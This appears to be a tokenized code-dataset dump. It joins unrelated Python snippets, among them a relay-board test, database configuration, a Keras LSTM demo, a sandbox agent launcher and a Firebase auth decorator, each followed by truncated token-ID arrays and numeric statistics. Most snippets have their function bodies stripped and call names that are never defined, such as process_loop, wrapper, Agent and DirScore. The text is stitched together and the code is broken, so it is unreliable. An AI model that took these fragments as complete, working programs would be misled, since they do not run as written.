#!/usr/bin/python '''***************************************************************************************************************** Seeed Studio Relay Board Library V2 Test Application #2 By John M. Wargo (https://www.johnwargo.com) ********************************************************************************************************************''' import sys import time from seeed_relay_v1 import Relay # Now see what we're supposed to do next if __name__ == "__main__": # Create the relay object relay = Relay() try: process_loop() except KeyboardInterrupt: print("\nExiting application") # turn off all of the relays relay.all_off() # exit the application sys.exit(0)
[ 2, 48443, 14629, 14, 8800, 14, 29412, 198, 7061, 6, 17174, 17174, 17174, 8412, 9, 198, 220, 220, 220, 1001, 2308, 11733, 4718, 323, 5926, 10074, 569, 17, 198, 220, 220, 220, 6208, 15678, 1303, 17, 198, 220, 220, 220, 2750, 1757, 337...
3.337719
228
import os from sqlalchemy import bindparam, create_engine, exc from sqlalchemy.dialects.postgresql.json import JSONB from sqlalchemy.engine.url import URL from sqlalchemy.sql import text from .utils import log, logerr # Setup SQL Alchemy vars. pg_opts = { 'drivername': os.getenv('PG_DRIVER'), 'username': os.getenv('PG_USER'), 'password': os.getenv('PG_PASSWORD'), 'host': os.getenv('PG_HOST'), 'port': os.getenv('PG_PORT'), 'database': os.getenv('PG_DATABASE') } pg_ssl = os.getenv('PG_SSL')
[ 11748, 28686, 198, 198, 6738, 44161, 282, 26599, 1330, 11007, 17143, 11, 2251, 62, 18392, 11, 2859, 198, 6738, 44161, 282, 26599, 13, 38969, 478, 82, 13, 7353, 34239, 13976, 13, 17752, 1330, 19449, 33, 198, 6738, 44161, 282, 26599, 13, ...
2.563725
204
import abc def make_selector(selector, **kwargs): output = '@' + selector if not kwargs: return output return '%s[%s]' % (output, str_pairs(kwargs.items())) GlobalEntity = _GlobalEntity() PosUtil = _PosUtil() def StackFrame(index): return StackFramePath StackFrameHead = StackFrame(0) def ensure_selector(sel_arg): assert isinstance(sel_arg, EntityRef), sel_arg return sel_arg UtilBlockPos = _UtilBlockPos(False) ZeroTickBlockPos = _UtilBlockPos(True)
[ 11748, 450, 66, 198, 198, 4299, 787, 62, 19738, 273, 7, 19738, 273, 11, 12429, 46265, 22046, 2599, 198, 220, 220, 220, 5072, 796, 705, 31, 6, 1343, 31870, 198, 220, 220, 220, 611, 407, 479, 86, 22046, 25, 198, 220, 220, 220, 220, ...
2.536082
194
import requests keyword = "python" try: kv = {'q':keyword} r = requests.get('http://www.so.com/s', params=kv) print(r.request.url) r.raise_for_status() print(len(r.text)) except: print('')
[ 11748, 7007, 198, 198, 2539, 4775, 796, 366, 29412, 1, 198, 28311, 25, 198, 220, 220, 220, 479, 85, 796, 1391, 6, 80, 10354, 2539, 4775, 92, 198, 220, 220, 220, 374, 796, 7007, 13, 1136, 10786, 4023, 1378, 2503, 13, 568, 13, 785, ...
2.151515
99
import torch.nn as nn
[ 11748, 28034, 13, 20471, 355, 299, 77, 628, 198 ]
2.666667
9
from django.contrib import admin from .models import File admin.site.register(File)
[ 6738, 42625, 14208, 13, 3642, 822, 1330, 13169, 198, 6738, 764, 27530, 1330, 9220, 198, 198, 28482, 13, 15654, 13, 30238, 7, 8979, 8, 198 ]
3.4
25
import shutil import socket import subprocess import threading import json import pickle import tempfile import time import box import threading import os import base64 import getpass import urllib import requests import zipfile import sys import pprint import platform DEBUG = True BPH_TEMPLATE_SERVER_IP = sys.argv[1] BPH_TEMPLATE_SERVER_PORT = int(sys.argv[2]) BPH_CONTROLLER_WEB_PORT = int(sys.argv[3]) running_os = platform.release() if running_os == "7": APP_DATA = "C:\\Users\\{current_user}\\AppData\\Roaming\\".format( current_user=getpass.getuser()) TMP_FOLDER = "C:\\Users\\{current_user}\\AppData\\Local\\Temp\\".format( current_user=getpass.getuser()) elif running_os == "XP": # To avoid tool issues when dealing with white-spaced paths. APP_DATA = "C:\\DOCUME~1\\{current_user}\\APPLIC~1\\".format( current_user=getpass.getuser()) TMP_FOLDER = "C:\\DOCUME~1\\{current_user}\\LOCALS~1\\Temp\\".format( current_user=getpass.getuser()) else: print "Unsupported platform! Exiting..." sys.exit() if __name__ == "__main__": agent = Agent() try: agent.start() while True: # agent.check_connection() if not agent.is_connected(): # If agent stops. Start it again. agent.start() except KeyboardInterrupt: print "Manual interruption. Bye!" sys.exit()
[ 11748, 4423, 346, 201, 198, 11748, 17802, 201, 198, 11748, 850, 14681, 201, 198, 11748, 4704, 278, 201, 198, 11748, 33918, 201, 198, 11748, 2298, 293, 201, 198, 11748, 20218, 7753, 201, 198, 11748, 640, 201, 198, 11748, 3091, 201, 198, ...
2.23486
677
# LSTM with Variable Length Input Sequences to One Character Output import numpy from keras.models import Sequential from keras.layers import Dense from keras.layers import LSTM from keras.utils import np_utils from keras.preprocessing.sequence import pad_sequences from theano.tensor.shared_randomstreams import RandomStreams # fix random seed for reproducibility numpy.random.seed(7) # define the raw dataset alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" # create mapping of characters to integers (0-25) and the reverse char_to_int = dict((c, i) for i, c in enumerate(alphabet)) int_to_char = dict((i, c) for i, c in enumerate(alphabet)) # prepare the dataset of input to output pairs encoded as integers num_inputs = 16 max_len = 5 dataX = [] dataY = [] for i in range(num_inputs): start = numpy.random.randint(len(alphabet)-2) end = numpy.random.randint(start, min(start+max_len,len(alphabet)-1)) sequence_in = alphabet[start:end+1] sequence_out = alphabet[end + 1] dataX.append([char_to_int[char] for char in sequence_in]) dataY.append(char_to_int[sequence_out]) print( sequence_in, '->', sequence_out ) # convert list of lists to array and pad sequences if needed X = pad_sequences(dataX, maxlen=max_len, dtype='float32') # reshape X to be [samples, time steps, features] X = numpy.reshape(X, (X.shape[0], max_len, 1)) # normalize X = X / float(len(alphabet)) # one hot encode the output variable y = np_utils.to_categorical(dataY) # create and fit the model batch_size = 1 model = Sequential() model.add(LSTM(16, batch_input_shape=(batch_size, X.shape[1], X.shape[2]), stateful=True)) model.add(Dense(y.shape[1], activation='softmax')) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) for i in range(1): model.fit(X, y, nb_epoch=1, batch_size=batch_size, verbose=2, shuffle=False) model.reset_states() # summarize performance of the model scores = model.evaluate(X, y, batch_size=batch_size, verbose=0) model.reset_states() print("Model Accuracy: %.2f%%" % (scores[1]*100)) # demonstrate some model predictions for i in range(1): pattern_index = numpy.random.randint(len(dataX)) pattern = dataX[pattern_index] x = pad_sequences([pattern], maxlen=max_len, dtype='float32') x = numpy.reshape(x, (1, max_len, 1)) x = x / float(len(alphabet)) prediction = model.predict(x, verbose=0) index = numpy.argmax(prediction) result = int_to_char[index] seq_in = [int_to_char[value] for value in pattern] print( seq_in, "->", result )
[ 2, 406, 2257, 44, 351, 35748, 22313, 23412, 24604, 3007, 284, 1881, 15684, 25235, 201, 198, 11748, 299, 32152, 201, 198, 6738, 41927, 292, 13, 27530, 1330, 24604, 1843, 201, 198, 6738, 41927, 292, 13, 75, 6962, 1330, 360, 1072, 201, 1...
2.638579
985
""" Direction prediction based on learning dataset from reactome PPI direction calculated from domain interaction directions """ # Imports import sqlite3, csv, os import pandas as pd import logging import pickle # # Initiating logger # logger = logging.getLogger() # handler = logging.FileHandler('../../workflow/SLK3.log') # logger.setLevel(logging.DEBUG) # handler.setLevel(logging.DEBUG) # formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') # handler.setFormatter(formatter) # logger.addHandler(handler) if __name__ == '__main__': test = DirScore() logger.debug('Creating test set') test.test_scores() logger.debug('Adding scores to dataset') test.apply_to_db() logger.debug('Direction prediction done')
[ 37811, 198, 35, 4154, 17724, 1912, 319, 4673, 27039, 422, 6324, 462, 198, 10246, 40, 4571, 10488, 422, 7386, 10375, 11678, 198, 37811, 198, 198, 2, 1846, 3742, 198, 11748, 44161, 578, 18, 11, 269, 21370, 11, 28686, 198, 11748, 19798, ...
3.039216
255
import json import os.path import sys from exceptions import * from create_folder_structure import create_folder_structure main()
[ 11748, 33918, 198, 11748, 28686, 13, 6978, 198, 11748, 25064, 198, 6738, 13269, 1330, 1635, 198, 6738, 2251, 62, 43551, 62, 301, 5620, 1330, 2251, 62, 43551, 62, 301, 5620, 628, 198, 198, 12417, 3419, 198 ]
3.694444
36
from datetime import timedelta import pytest from model_bakery import baker
[ 6738, 4818, 8079, 1330, 28805, 12514, 198, 198, 11748, 12972, 9288, 198, 6738, 2746, 62, 65, 33684, 1330, 46412, 628 ]
3.9
20
from flask import request from google.auth.transport import requests import google.oauth2.id_token from server.ApplikationsAdministration import ApplikationsAdministration #Benutzer.py, BenutzerMapper + BenutzerMethoden in ApplikationsAdministration def secured(function): """Decorator zur Google Firebase-basierten Authentifizierung von Benutzern Da es sich bei diesem System um eine basale Fallstudie zu Lehrzwecken handelt, wurde hier bewusst auf ein ausgefeiltes Berechtigungskonzept verzichtet. Vielmehr soll dieses Decorator einen Weg aufzeigen, wie man technisch mit vertretbarem Aufwand in eine Authentifizierung einsteigen kann. POLICY: Die hier demonstrierte Policy ist, dass jeder, der einen durch Firebase akzeptierten Account besitzt, sich an diesem System anmelden kann. Bei jeder Anmeldung werden Klarname, Mail-Adresse sowie die Google User ID in unserem System gespeichert bzw. geupdated. Auf diese Weise knnte dann fr eine Erweiterung des Systems auf jene Daten zurckgegriffen werden. """ firebase_request_adapter = requests.Request() return wrapper
[ 6738, 42903, 1330, 2581, 198, 6738, 23645, 13, 18439, 13, 7645, 634, 1330, 7007, 198, 11748, 23645, 13, 12162, 1071, 17, 13, 312, 62, 30001, 198, 198, 6738, 4382, 13, 4677, 46965, 602, 41862, 1358, 1330, 39100, 1134, 602, 41862, 1358, ...
2.821608
398